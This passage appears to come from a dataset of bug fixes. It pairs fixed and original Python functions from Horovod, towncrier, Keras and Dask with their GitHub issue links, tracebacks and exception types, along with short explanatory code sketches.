# expected that the following function will find at least one interface
# otherwise, it will raise an exception.
common_intfs = _driver_fn(
all_host_names, local_host_names, settings, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("Interfaces on all the hosts were successfully checked.")
print("Common interface found: " + " ".join(common_intfs))
else:
if settings.verbose >= 2:
print("All hosts are local, finding the interfaces with address 127.0.0.1")
# If all the given hosts are local, find the interfaces with address
# 127.0.0.1
common_intfs = set()
for iface, addrs in net_if_addrs().items():
for addr in addrs:
if addr.family == AF_INET and addr.address == "127.0.0.1":
common_intfs.add(iface)
break
if len(common_intfs) == 0:
raise ValueError("No interface is found for address 127.0.0.1.")
if settings.verbose >= 2:
print("Local interface found " + " ".join(common_intfs))
if args.use_gloo:
if not gloo_built():
raise ValueError(
"Gloo support has not been built. If this is not expected, ensure CMake is installed "
"and reinstall Horovod with HOROVOD_WITH_GLOO=1 to debug the build error."
)
gloo_run(settings, remote_host_names, common_intfs)
elif args.use_mpi:
if not mpi_built():
raise ValueError(
"MPI support has not been built. If this is not expected, ensure MPI is installed "
"and reinstall Horovod with HOROVOD_WITH_MPI=1 to debug the build error."
)
mpi_run(settings, common_intfs)
else:
if mpi_built():
mpi_run(settings, common_intfs)
elif gloo_built():
gloo_run(settings, remote_host_names, common_intfs)
else:
raise ValueError(
"Neither MPI nor Gloo support has been built. Try reinstalling Horovod ensuring that "
"either MPI is installed (MPI) or CMake is installed (Gloo)."
)
|
https://github.com/horovod/horovod/issues/1325
|
# horovodrun --verbose -np 1 -H 10.0.0.3:1 -p 12345 python /horovod/examples/keras_mnist.py
Traceback (most recent call last):
File "/usr/local/bin/horovodrun", line 21, in <module>
run.run()
File "/usr/local/lib/python3.6/dist-packages/horovod/run/run.py", line 396, in run
raise ValueError('Invalid host input, please make sure it has '
ValueError: Invalid host input, please make sure it has format as : worker-0:2,worker-1:2.
|
ValueError
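A minimal sketch (plain Python re, nothing from Horovod assumed) of why the before_merge pattern raises the ValueError above for dotted hosts such as 10.0.0.3:1, and why adding '.' to the character class fixes it:

import re

old_pattern = re.compile(r"^[\w-]+:\d+$")   # before_merge: '.' not allowed
new_pattern = re.compile(r"^[\w.-]+:\d+$")  # after_merge: '.' added for IPs/FQDNs

host = "10.0.0.3:1"
print(bool(old_pattern.match(host)))  # False -> "Invalid host input" ValueError
print(bool(new_pattern.match(host)))  # True  -> host accepted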
|
def train(epoch):
model.train()
train_sampler.set_epoch(epoch)
train_loss = Metric("train_loss")
train_accuracy = Metric("train_accuracy")
with tqdm(
total=len(train_loader),
desc="Train Epoch #{}".format(epoch + 1),
disable=not verbose,
) as t:
for batch_idx, (data, target) in enumerate(train_loader):
adjust_learning_rate(epoch, batch_idx)
if args.cuda:
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
# Split data into sub-batches of size batch_size
for i in range(0, len(data), args.batch_size):
data_batch = data[i : i + args.batch_size]
target_batch = target[i : i + args.batch_size]
output = model(data_batch)
train_accuracy.update(accuracy(output, target_batch))
loss = F.cross_entropy(output, target_batch)
train_loss.update(loss)
# Average gradients among sub-batches
loss.div_(math.ceil(float(len(data)) / args.batch_size))
loss.backward()
# Gradient is applied across all ranks
optimizer.step()
t.set_postfix(
{
"loss": train_loss.avg.item(),
"accuracy": 100.0 * train_accuracy.avg.item(),
}
)
t.update(1)
if log_writer:
log_writer.add_scalar("train/loss", train_loss.avg, epoch)
log_writer.add_scalar("train/accuracy", train_accuracy.avg, epoch)
|
def train(epoch):
model.train()
train_sampler.set_epoch(epoch)
train_loss = Metric("train_loss")
train_accuracy = Metric("train_accuracy")
with tqdm(
total=len(train_loader),
desc="Train Epoch #{}".format(epoch + 1),
disable=not verbose,
) as t:
for batch_idx, (data, target) in enumerate(train_loader):
adjust_learning_rate(epoch, batch_idx)
if args.cuda:
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
# Split data into sub-batches of size batch_size
for i in range(0, len(data), args.batch_size):
data_batch = data[i : i + args.batch_size]
target_batch = target[i : i + args.batch_size]
output = model(data_batch)
train_accuracy.update(accuracy(output, target_batch))
loss = F.cross_entropy(output, target_batch)
train_loss.update(loss.item())
# Average gradients among sub-batches
loss.div_(math.ceil(float(len(data)) / args.batch_size))
loss.backward()
# Gradient is applied across all ranks
optimizer.step()
t.set_postfix(
{
"loss": train_loss.avg.item(),
"accuracy": 100.0 * train_accuracy.avg.item(),
}
)
t.update(1)
if log_writer:
log_writer.add_scalar("train/loss", train_loss.avg, epoch)
log_writer.add_scalar("train/accuracy", train_accuracy.avg, epoch)
|
https://github.com/horovod/horovod/issues/852
|
Train Epoch #1: 0%| | 0/10010 [00:00<?, ?it/s]Traceback (most recent call last):
File "main_hvd.py", line 272, in <module>
train(epoch)
File "main_hvd.py", line 179, in train
train_loss.update(loss.item())
File "main_hvd.py", line 263, in update
self.sum += hvd.allreduce(val.detach().cpu(), name=self.name)
AttributeError: 'float' object has no attribute 'detach'
|
AttributeError
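A minimal sketch (torch only; the example's Metric class is assumed to call val.detach() inside update, as the traceback shows) of the type mismatch: loss.item() yields a plain Python float, which has no .detach(), while passing the tensor itself works:

import torch

loss = torch.tensor(0.5)

# before_merge: update received loss.item(), a plain float
try:
    loss.item().detach()
except AttributeError as e:
    print(e)  # 'float' object has no attribute 'detach'

# after_merge: update receives the tensor, so .detach().cpu() succeeds
print(loss.detach().cpu())  # tensor(0.5000)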
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
    # Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtype):
def _from_tensor():
optimizer.param_groups[index][option_key] = dtype(option_tensor.numpy()[0])
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtype = type(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtype
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
    # Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
https://github.com/horovod/horovod/issues/605
|
Traceback (most recent call last):
File "train.py", line 641, in <module>
train_images(hps)
File "train.py", line 444, in train_images
train_step(batch, batch_idx, epoch, hps, model, opt, train_logger)
File "train.py", line 457, in train_step
opt.step()
File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 97, in step
return super(self.__class__, self).step(closure)
File "/opt/conda/lib/python3.6/site-packages/torch/optim/adamax.py", line 75, in step
exp_avg.mul_(beta1).add_(1 - beta1, grad)
TypeError: mul_() received an invalid combination of arguments - got (numpy.float32), but expected one of:
* (Tensor other)
didn't match because some of the arguments have invalid types: (numpy.float32)
* (float other)
didn't match because some of the arguments have invalid types: (numpy.float32)
|
TypeError
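A minimal sketch (torch and numpy assumed) of why the nested cast matters for options such as Adam's betas tuple: a flat type(option_value) cast leaves numpy.float32 elements, which later trip exp_avg.mul_(beta1) as in the traceback, while the recursive cast restores plain Python floats:

import collections.abc
import torch

def _get_types(x):
    # Record the full (possibly nested) type structure of x.
    if isinstance(x, collections.abc.Iterable):
        return type(x), [_get_types(xi) for xi in x]
    return type(x)

def _recursive_cast(x, dtype):
    if isinstance(dtype, tuple):
        t, dtypes = dtype
        x = t(x)
        return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
    return dtype(x)

betas = (0.9, 0.999)                    # e.g. Adam's betas option
option_tensor = torch.Tensor([betas])   # wrapped for broadcast, as above

flat = tuple(option_tensor.numpy()[0])  # before_merge-style flat cast
print(type(flat[0]))                    # <class 'numpy.float32'>

nested = _recursive_cast(option_tensor.numpy()[0], _get_types(betas))
print(type(nested[0]))                  # <class 'float'>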
|
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.numpy()[0], dtypes
)
return _from_tensor
|
def _create_option_callback(index, option_key, option_tensor, dtype):
def _from_tensor():
optimizer.param_groups[index][option_key] = dtype(option_tensor.numpy()[0])
return _from_tensor
|
https://github.com/horovod/horovod/issues/605
|
Traceback (most recent call last):
File "train.py", line 641, in <module>
train_images(hps)
File "train.py", line 444, in train_images
train_step(batch, batch_idx, epoch, hps, model, opt, train_logger)
File "train.py", line 457, in train_step
opt.step()
File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 97, in step
return super(self.__class__, self).step(closure)
File "/opt/conda/lib/python3.6/site-packages/torch/optim/adamax.py", line 75, in step
exp_avg.mul_(beta1).add_(1 - beta1, grad)
TypeError: mul_() received an invalid combination of arguments - got (numpy.float32), but expected one of:
* (Tensor other)
didn't match because some of the arguments have invalid types: (numpy.float32)
* (float other)
didn't match because some of the arguments have invalid types: (numpy.float32)
|
TypeError
|
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.numpy()[0], dtypes
)
|
def _from_tensor():
optimizer.param_groups[index][option_key] = dtype(option_tensor.numpy()[0])
|
https://github.com/horovod/horovod/issues/605
|
Traceback (most recent call last):
File "train.py", line 641, in <module>
train_images(hps)
File "train.py", line 444, in train_images
train_step(batch, batch_idx, epoch, hps, model, opt, train_logger)
File "train.py", line 457, in train_step
opt.step()
File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 97, in step
return super(self.__class__, self).step(closure)
File "/opt/conda/lib/python3.6/site-packages/torch/optim/adamax.py", line 75, in step
exp_avg.mul_(beta1).add_(1 - beta1, grad)
TypeError: mul_() received an invalid combination of arguments - got (numpy.float32), but expected one of:
* (Tensor other)
didn't match because some of the arguments have invalid types: (numpy.float32)
* (float other)
didn't match because some of the arguments have invalid types: (numpy.float32)
|
TypeError
|
def find_fragments(base_directory, sections, fragment_directory, definitions):
"""
    Sections are a dictionary of section names to paths.
"""
content = OrderedDict()
fragment_filenames = []
for key, val in sections.items():
if fragment_directory is not None:
section_dir = os.path.join(base_directory, val, fragment_directory)
else:
section_dir = os.path.join(base_directory, val)
if sys.version_info >= (3,):
expected_exception = FileNotFoundError
else:
expected_exception = OSError
try:
files = os.listdir(section_dir)
except expected_exception as e:
message = "Failed to list the news fragment files.\n{}".format(
"".join(traceback.format_exception_only(type(e), e)),
)
raise ConfigError(message)
file_content = {}
for basename in files:
ticket, category, counter = parse_newfragment_basename(
basename, definitions
)
if category is None:
continue
full_filename = os.path.join(section_dir, basename)
fragment_filenames.append(full_filename)
with open(full_filename, "rb") as f:
data = f.read().decode("utf8", "replace")
if (ticket, category, counter) in file_content:
raise ValueError(
"multiple files for {}.{} in {}".format(
ticket, category, section_dir
)
)
file_content[ticket, category, counter] = data
content[key] = file_content
return content, fragment_filenames
|
def find_fragments(base_directory, sections, fragment_directory, definitions):
"""
    Sections are a dictionary of section names to paths.
"""
content = OrderedDict()
fragment_filenames = []
for key, val in sections.items():
if fragment_directory is not None:
section_dir = os.path.join(base_directory, val, fragment_directory)
else:
section_dir = os.path.join(base_directory, val)
files = os.listdir(section_dir)
file_content = {}
for basename in files:
ticket, category, counter = parse_newfragment_basename(
basename, definitions
)
if category is None:
continue
full_filename = os.path.join(section_dir, basename)
fragment_filenames.append(full_filename)
with open(full_filename, "rb") as f:
data = f.read().decode("utf8", "replace")
if (ticket, category, counter) in file_content:
raise ValueError(
"multiple files for {}.{} in {}".format(
ticket, category, section_dir
)
)
file_content[ticket, category, counter] = data
content[key] = file_content
return content, fragment_filenames
|
https://github.com/twisted/towncrier/issues/85
|
Loading template...
Finding news fragments...
Traceback (most recent call last):
…
File "/tmp/myvenv/lib/python2.7/site-packages/towncrier/_builder.py", line 46, in find_fragments
files = os.listdir(section_dir)
OSError: [Errno 2] No such file or directory: '…/PyInstaller/newsfragments'
|
OSError
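A minimal sketch of the compatibility pattern introduced here: FileNotFoundError does not exist on Python 2, so the except clause is chosen per interpreter, and the raw OSError above becomes a friendlier error (ConfigError is a hypothetical stand-in for towncrier's own exception):

import os
import sys
import traceback

class ConfigError(Exception):
    """Hypothetical stand-in for towncrier's ConfigError."""

expected_exception = FileNotFoundError if sys.version_info >= (3,) else OSError

try:
    os.listdir("no/such/newsfragments")  # hypothetical missing directory
except expected_exception as e:
    message = "Failed to list the news fragment files.\n{}".format(
        "".join(traceback.format_exception_only(type(e), e))
    )
    print(ConfigError(message))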
|
def __main(comparewith, directory, config):
base_directory, config = load_config_from_options(directory, config)
# Use UTF-8 both when sys.stdout does not have .encoding (Python 2.7) and
# when the attribute is present but set to None (explicitly piped output
# and also some CI such as GitHub Actions).
encoding = getattr(sys.stdout, "encoding", None)
if encoding is None:
encoding = "utf8"
try:
files_changed = (
_run(
["git", "diff", "--name-only", comparewith + "..."], cwd=base_directory
)
.decode(encoding)
.strip()
)
except CalledProcessError as e:
click.echo("git produced output while failing:")
click.echo(e.output)
raise
if not files_changed:
click.echo("On trunk, or no diffs, so no newsfragment required.")
sys.exit(0)
files = {
os.path.normpath(os.path.join(base_directory, path))
for path in files_changed.strip().splitlines()
}
click.echo("Looking at these files:")
click.echo("----")
for n, change in enumerate(files, start=1):
click.echo("{}. {}".format(n, change))
click.echo("----")
fragments = set()
if config.get("directory"):
fragment_base_directory = os.path.abspath(config["directory"])
fragment_directory = None
else:
fragment_base_directory = os.path.abspath(
os.path.join(base_directory, config["package_dir"], config["package"])
)
fragment_directory = "newsfragments"
fragments = {
os.path.normpath(path)
for path in find_fragments(
fragment_base_directory,
config["sections"],
fragment_directory,
config["types"],
)[1]
}
fragments_in_branch = fragments & files
if not fragments_in_branch:
click.echo("No new newsfragments found on this branch.")
sys.exit(1)
else:
click.echo("Found:")
for n, fragment in enumerate(fragments_in_branch, start=1):
click.echo("{}. {}".format(n, fragment))
sys.exit(0)
|
def __main(comparewith, directory, config):
base_directory, config = load_config_from_options(directory, config)
try:
files_changed = (
_run(
["git", "diff", "--name-only", comparewith + "..."], cwd=base_directory
)
.decode(getattr(sys.stdout, "encoding", "utf8"))
.strip()
)
except CalledProcessError as e:
click.echo("git produced output while failing:")
click.echo(e.output)
raise
if not files_changed:
click.echo("On trunk, or no diffs, so no newsfragment required.")
sys.exit(0)
files = {
os.path.normpath(os.path.join(base_directory, path))
for path in files_changed.strip().splitlines()
}
click.echo("Looking at these files:")
click.echo("----")
for n, change in enumerate(files, start=1):
click.echo("{}. {}".format(n, change))
click.echo("----")
fragments = set()
if config.get("directory"):
fragment_base_directory = os.path.abspath(config["directory"])
fragment_directory = None
else:
fragment_base_directory = os.path.abspath(
os.path.join(base_directory, config["package_dir"], config["package"])
)
fragment_directory = "newsfragments"
fragments = {
os.path.normpath(path)
for path in find_fragments(
fragment_base_directory,
config["sections"],
fragment_directory,
config["types"],
)[1]
}
fragments_in_branch = fragments & files
if not fragments_in_branch:
click.echo("No new newsfragments found on this branch.")
sys.exit(1)
else:
click.echo("Found:")
for n, fragment in enumerate(fragments_in_branch, start=1):
click.echo("{}. {}".format(n, fragment))
sys.exit(0)
|
https://github.com/twisted/towncrier/issues/175
|
Traceback (most recent call last):
File "/opt/hostedtoolcache/Python/2.7.17/x64/lib/python2.7/runpy.py", line 174, in _run_module_as_main
"__main__", fname, loader, pkg_name)
File "/opt/hostedtoolcache/Python/2.7.17/x64/lib/python2.7/runpy.py", line 72, in _run_code
exec code in run_globals
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/towncrier/check.py", line 98, in <module>
_main()
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/click/core.py", line 764, in __call__
return self.main(*args, **kwargs)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/click/core.py", line 717, in main
rv = self.invoke(ctx)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/click/core.py", line 956, in invoke
return ctx.invoke(self.callback, **ctx.params)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/click/core.py", line 555, in invoke
return callback(*args, **kwargs)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/towncrier/check.py", line 31, in _main
return __main(compare_with, directory, pyproject)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/towncrier/check.py", line 44, in __main
.decode(getattr(sys.stdout, "encoding", "utf8"))
TypeError: decode() argument 1 must be string, not None
|
TypeError
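A minimal sketch (plain Python) of the getattr pitfall behind the TypeError above: the default fires only when the attribute is missing, but a piped stdout can carry encoding = None, which getattr returns as-is; the fix normalizes None explicitly (PipedStdout is a hypothetical stand-in):

import sys

class PipedStdout:
    encoding = None  # attribute present but None, as on some CI pipes

print(getattr(PipedStdout(), "encoding", "utf8"))  # None, not 'utf8'

# after_merge pattern: treat a present-but-None encoding like a missing one
encoding = getattr(sys.stdout, "encoding", None)
if encoding is None:
    encoding = "utf8"
print(b"hello".decode(encoding))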
|
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = lambda seqs: multiprocessing.Pool(
workers, initializer=init_pool, initargs=(seqs,)
)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
|
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = lambda: multiprocessing.Pool(workers)
else:
self.executor_fn = lambda: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
|
https://github.com/keras-team/keras/issues/9434
|
Traceback (most recent call last):
File "C:\Users\elcombato\AppData\Local\Continuum\Anaconda3\envs\ml\lib\multiprocessing\pool.py", line 119, in worker
result = (True, func(*args, **kwds))
File "C:\Users\elcombato\AppData\Local\Continuum\Anaconda3\envs\ml\lib\site-packages\keras\utils\data_utils.py", line 392, in get_index
return _SHARED_SEQUENCES[uid][i]
KeyError: 0
|
KeyError
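A minimal sketch (standard multiprocessing only) of the initializer fix: spawn-based workers reimport the module with an empty module-level dict, so without initializer/initargs the lookup raises KeyError: 0 exactly as above; seeding each worker through init_pool makes the shared state visible:

import multiprocessing

_SHARED = {}  # stands in for keras' _SHARED_SEQUENCES

def init_pool(shared):
    # Runs once per worker process, rebinding the global there.
    global _SHARED
    _SHARED = shared

def get_item(key):
    return _SHARED[key]

if __name__ == "__main__":
    _SHARED[0] = "sequence-0"
    with multiprocessing.Pool(2, initializer=init_pool,
                              initargs=(_SHARED,)) as pool:
        print(pool.apply(get_item, (0,)))  # 'sequence-0' on every platform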
|
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True
)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
|
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn()) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True
)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
|
https://github.com/keras-team/keras/issues/9434
|
Traceback (most recent call last):
File "C:\Users\elcombato\AppData\Local\Continuum\Anaconda3\envs\ml\lib\multiprocessing\pool.py", line 119, in worker
result = (True, func(*args, **kwds))
File "C:\Users\elcombato\AppData\Local\Continuum\Anaconda3\envs\ml\lib\site-packages\keras\utils\data_utils.py", line 392, in get_index
return _SHARED_SEQUENCES[uid][i]
KeyError: 0
|
KeyError
|
def __init__(
self,
address=None,
loop=None,
timeout=no_default,
set_as_default=True,
scheduler_file=None,
security=None,
asynchronous=False,
name=None,
heartbeat_interval=None,
serializers=None,
deserializers=None,
extensions=DEFAULT_EXTENSIONS,
direct_to_workers=None,
connection_limit=512,
**kwargs,
):
if timeout == no_default:
timeout = dask.config.get("distributed.comm.timeouts.connect")
if timeout is not None:
timeout = parse_timedelta(timeout, "s")
self._timeout = timeout
self.futures = dict()
self.refcount = defaultdict(lambda: 0)
self.coroutines = []
if name is None:
name = dask.config.get("client-name", None)
self.id = (
type(self).__name__
+ ("-" + name + "-" if name else "-")
+ str(uuid.uuid1(clock_seq=os.getpid()))
)
self.generation = 0
self.status = "newly-created"
self._pending_msg_buffer = []
self.extensions = {}
self.scheduler_file = scheduler_file
self._startup_kwargs = kwargs
self.cluster = None
self.scheduler = None
self._scheduler_identity = {}
# A reentrant-lock on the refcounts for futures associated with this
# client. Should be held by individual operations modifying refcounts,
# or any bulk operation that needs to ensure the set of futures doesn't
# change during operation.
self._refcount_lock = threading.RLock()
self.datasets = Datasets(self)
self._serializers = serializers
if deserializers is None:
deserializers = serializers
self._deserializers = deserializers
self.direct_to_workers = direct_to_workers
# Communication
self.scheduler_comm = None
if address is None:
address = dask.config.get("scheduler-address", None)
if address:
logger.info("Config value `scheduler-address` found: %s", address)
if address is not None and kwargs:
raise ValueError("Unexpected keyword arguments: {}".format(str(sorted(kwargs))))
if isinstance(address, (rpc, PooledRPCCall)):
self.scheduler = address
elif isinstance(getattr(address, "scheduler_address", None), str):
# It's a LocalCluster or LocalCluster-compatible object
self.cluster = address
with suppress(AttributeError):
loop = address.loop
if security is None:
security = getattr(self.cluster, "security", None)
elif address is not None and not isinstance(address, str):
raise TypeError(
"Scheduler address must be a string or a Cluster instance, got {}".format(
type(address)
)
)
if security is None:
security = Security()
elif security is True:
security = Security.temporary()
self._startup_kwargs["security"] = security
elif not isinstance(security, Security):
raise TypeError("security must be a Security object")
self.security = security
if name == "worker":
self.connection_args = self.security.get_connection_args("worker")
else:
self.connection_args = self.security.get_connection_args("client")
self._connecting_to_scheduler = False
self._asynchronous = asynchronous
self._should_close_loop = not loop
self._loop_runner = LoopRunner(loop=loop, asynchronous=asynchronous)
self.io_loop = self.loop = self._loop_runner.loop
self._gather_keys = None
self._gather_future = None
if heartbeat_interval is None:
heartbeat_interval = dask.config.get("distributed.client.heartbeat")
heartbeat_interval = parse_timedelta(heartbeat_interval, default="ms")
scheduler_info_interval = parse_timedelta(
dask.config.get("distributed.client.scheduler-info-interval", default="ms")
)
self._periodic_callbacks = dict()
self._periodic_callbacks["scheduler-info"] = PeriodicCallback(
self._update_scheduler_info,
scheduler_info_interval * 1000,
)
self._periodic_callbacks["heartbeat"] = PeriodicCallback(
self._heartbeat, heartbeat_interval * 1000
)
self._start_arg = address
if set_as_default:
self._set_config = dask.config.set(
scheduler="dask.distributed", shuffle="tasks"
)
self._stream_handlers = {
"key-in-memory": self._handle_key_in_memory,
"lost-data": self._handle_lost_data,
"cancelled-key": self._handle_cancelled_key,
"task-retried": self._handle_retried_key,
"task-erred": self._handle_task_erred,
"restart": self._handle_restart,
"error": self._handle_error,
}
self._state_handlers = {
"memory": self._handle_key_in_memory,
"lost": self._handle_lost_data,
"erred": self._handle_task_erred,
}
self.rpc = ConnectionPool(
limit=connection_limit,
serializers=serializers,
deserializers=deserializers,
deserialize=True,
connection_args=self.connection_args,
timeout=timeout,
server=self,
)
for ext in extensions:
ext(self)
self.start(timeout=timeout)
Client._instances.add(self)
from distributed.recreate_exceptions import ReplayExceptionClient
ReplayExceptionClient(self)
|
def __init__(
self,
address=None,
loop=None,
timeout=no_default,
set_as_default=True,
scheduler_file=None,
security=None,
asynchronous=False,
name=None,
heartbeat_interval=None,
serializers=None,
deserializers=None,
extensions=DEFAULT_EXTENSIONS,
direct_to_workers=None,
